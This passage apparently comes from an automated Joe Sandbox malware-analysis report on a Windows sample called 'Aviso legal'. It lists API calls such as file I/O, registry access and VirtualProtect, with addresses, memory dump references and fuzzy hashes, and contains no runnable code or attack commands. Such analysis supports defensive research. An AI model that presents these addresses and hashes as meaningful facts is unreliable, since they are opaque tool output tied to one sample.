                                  • Part of subcall function 004069B5: GetExitCodeProcess.KERNEL32(?,?), ref: 004069E8
                                  • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: MessageSend$CloseProcesslstrlen$ChangeCodeCreateExitFindHandleNotificationObjectSingleTextWaitWindowlstrcatwsprintf
                                • String ID:
                                • API String ID: 1543427666-0
                                • Opcode ID: 5953877b6410b482209df80f50a5fc1a362c20bdcc401faed897dac012a701f2
                                • Instruction ID: a015d294fcb9cc4e365613bb9e09bf6e78b00889af70ee47f703a6c6056ea9c8
                                • Opcode Fuzzy Hash: 5953877b6410b482209df80f50a5fc1a362c20bdcc401faed897dac012a701f2
                                • Instruction Fuzzy Hash: 2DF09072904112EBCB21BBA59A84EDE76E8DF01318F25403BE102B21D1D77C4E429A6E
                                APIs
                                • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028AF
                                  • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: FilePointerwsprintf
                                • String ID:
                                • API String ID: 327478801-0
                                • Opcode ID: 1a69bed114d0c3cb27e295a60469d00fb85b85c1c8bbaab52ea3f411131a6a45
                                • Instruction ID: a13d1cf18dcce6f7d85bed0b4e0fde0de6b16079219dfacd376ffc086bc6f252
                                • Opcode Fuzzy Hash: 1a69bed114d0c3cb27e295a60469d00fb85b85c1c8bbaab52ea3f411131a6a45
                                • Instruction Fuzzy Hash: D3E09271A04105BFDB01EFA5AE499AEB3B8EF44319B10483BF102F00C1DA794D119B2D
                                APIs
                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: PrivateProfileStringWrite
                                • String ID:
                                • API String ID: 390214022-0
                                • Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                • Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
                                • Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                • Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD
                                APIs
                                • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 00406401
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                • Instruction ID: ccab944935cfefb85f0e849ce69279fb55db75a3b7fb0960311cd9d36817041a
                                • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                • Instruction Fuzzy Hash: 04E0E6B2010109BFEF095F90DC0AD7B3B1DE704300F01892EFD06D4091E6B5AD306675
                                APIs
                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: FileWrite
                                • String ID:
                                • API String ID: 3934441357-0
                                • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                • Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
                                • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                • Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4
                                APIs
                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: FileRead
                                • String ID:
                                • API String ID: 2738559852-0
                                • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                • Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
                                • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                • Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4
                                APIs
                                • VirtualProtect.KERNELBASE(705B505C,00000004,00000040,705B504C), ref: 705B2A9D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1427938394.00000000705B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 705B0000, based on PE: true
                                • Associated: 00000000.00000002.1427870963.00000000705B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000000.00000002.1427971257.00000000705B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000000.00000002.1428000657.00000000705B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_705b0000_Aviso legal.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 311473441ba07ec432215f1b11bc05ee6e4f4e5aa4f2d800245adb71a230f7b6
                                • Instruction ID: 0816c0483dfd890899e116d980ac4ed781dfeb11343fcf51072dc9cb371b0db4
                                • Opcode Fuzzy Hash: 311473441ba07ec432215f1b11bc05ee6e4f4e5aa4f2d800245adb71a230f7b6
                                • Instruction Fuzzy Hash: 0AF0ACB2504288DEC3D9FF2A9C8C7093FF0BB28304B24472AE188D6260E3747C44CB91
                                APIs
                                • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406438,?,00000000,?,?,Call,?), ref: 004063CE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: Open
                                • String ID:
                                • API String ID: 71445658-0
                                • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                • Instruction ID: 4361357c0318622cec318f667d88df30c4c29b75262f7bca7234b06b46464da2
                                • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                • Instruction Fuzzy Hash: 83D0123210020EBBDF115F91AD01FAB3B5DAB08310F014426FE06E40A1D775D530A764
                                APIs
                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: 30328d7073751e656d59c65da3bf6c6accfc47a5a9bf7eee50ca0d6ba827389c
                                • Instruction ID: 33d43a8ddb5fee1851102b8e64c9f064c627007e01bf6cdc746e786b0f5045d9
                                • Opcode Fuzzy Hash: 30328d7073751e656d59c65da3bf6c6accfc47a5a9bf7eee50ca0d6ba827389c
                                • Instruction Fuzzy Hash: 30D01772B08110DBDB11DBA8AA48B9D72A4AB50368B208537D111F61D0E6B8C945AA19
                                APIs
                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                • Instruction ID: 729772cd993a62bf3dcd5a53f5ba0c6067f9c4589e443fe2cdcdd0dddf41cb53
                                • Opcode Fuzzy Hash: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                • Instruction Fuzzy Hash: 74C04CB1740605BADA108B509D45F0677546750701F188429B641A50E0CA74E410D62C
                                APIs
                                • SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                • Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
                                • Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                • Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08
                                APIs
                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: FilePointer
                                • String ID:
                                • API String ID: 973152223-0
